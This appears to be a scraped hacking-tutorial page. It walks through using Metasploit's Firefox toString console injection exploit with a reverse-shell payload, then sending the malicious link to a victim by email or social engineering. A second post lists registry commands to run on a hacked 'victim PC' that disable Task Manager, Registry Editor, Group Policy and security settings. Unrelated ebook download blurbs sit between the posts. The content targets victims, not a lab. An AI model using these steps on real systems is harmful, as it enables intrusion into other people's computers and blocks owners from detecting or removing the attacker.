Hack Remote Windows, Linux, MAC PC using Firefox to String console.time Privileged JavaScript Injection

0

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets

Firefox Version 15-22

Windows 7

Linux

Solaris

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_tostring_console_injection

msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_tostring_console_injection)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_tostring_console_injection)>set srvhost 192.168.0.104

msf exploit (firefox_tostring_console_injection)>set uripath /

msf exploit (firefox_tostring_console_injection)>exploit

Now an URL you should give to your victim http://192.168.0.104:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Python Forensics

0

Download

Password: www.hackingarticles.in

Best of Remote Windows PC Hacking Tricks (Part 1)

0

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

How to Disable and Enable services.msc

REG add “HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}” /v Restrict_Run /t REG_DWORD /d 1 /f

To Enable services.msc

REG add “HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}” /v Restrict_Run /t REG_DWORD /d 0 /f

How to Disable and Enable Internet Options

REG add “HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions” /v NoBrowserOptions /t REG_DWORD /d 1 /f

To Enable Internet Options:

REG add “HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions” /v NoBrowserOptions /t REG_DWORD /d 0 /f

How to Disable and Enable Folder Options

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

To Enable Folder Options:

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 0 /f

How to Disable and Enable Security tab

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 1 /f

To Enable Security tab

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 0 /f

How to Disable and Enable Group Policy

REG add “HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}” /v Restrict_Run /t REG_DWORD /d 1 /f

To Enable Group Policy

REG add “HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}” /v Restrict_Run /t REG_DWORD /d 0 /f

 How to Disable and Enable Task Manager

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

To Enable Task Manager

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

How to Disable Registry Editor

REG add  HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

Computing Handbook, 3rd Edition: Information Systems and Information Technology

0

Download

Password: www.hackingarticles.in

Go to Top